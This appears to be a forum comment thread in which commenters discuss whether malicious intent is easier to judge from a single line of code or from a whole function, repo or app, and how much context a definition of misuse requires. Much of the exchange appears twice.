It is easier to tell apart a malicious function from a line of code, a file from a function, a repo from a file, or an app from a repo.
This paragraph does not make sense to me. (Maybe my reading comprehension is not up to the task).
Is the thesis that the same line of code may be malicious or not, depending on its context?
I would say that it is easier to judge the maliciousness of a single line of code than of the whole function, simply because the analysis of the whole function requires much more resources. You can rule out certain classes of threats by inspecting that one line, while remaining ignorant about a much larger set of classes of threats which require a broader context. If your threat model requires you to decide about those other classes of threats, you must expend those additional resources. It is not about something being easier; it’s about being able to make the judgement at all.
[EDIT] Or rephrasing, You need to see a certain breadth of context before you can judge if a system is misused according to some definition of misuse. You can do with a narrow context for certain narrow definitions of misuse; but the wider your definition of misuse, the wider context you have to analyze before you can decide.
I should clarify that section. I meant that if you’re asked to write a line of code or an app or whatever then it is easier to guess at intent/consequences for the higher level tasks. Another example: the lab manager has a better idea of what’s going on than a lab assistant.
This paragraph does not make sense to me. (Maybe my reading comprehension is not up to the task).
Is the thesis that the same line of code may be malicious or not, depending on its context?
I would say that it is easier to judge the maliciousness of a single line of code than of the whole function, simply because the analysis of the whole function requires much more resources. You can rule out certain classes of threats by inspecting that one line, while remaining ignorant about a much larger set of classes of threats which require a broader context. If your threat model requires you to decide about those other classes of threats, you must expend those additional resources. It is not about something being easier; it’s about being able to make the judgement at all.
[EDIT] Or rephrasing, You need to see a certain breadth of context before you can judge if a system is misused according to some definition of misuse. You can do with a narrow context for certain narrow definitions of misuse; but the wider your definition of misuse, the wider context you have to analyze before you can decide.
I should clarify that section. I meant that if you’re asked to write a line of code or an app or whatever then it is easier to guess at intent/consequences for the higher level tasks. Another example: the lab manager has a better idea of what’s going on than a lab assistant.
Ah, ok. Thank you for clarifying.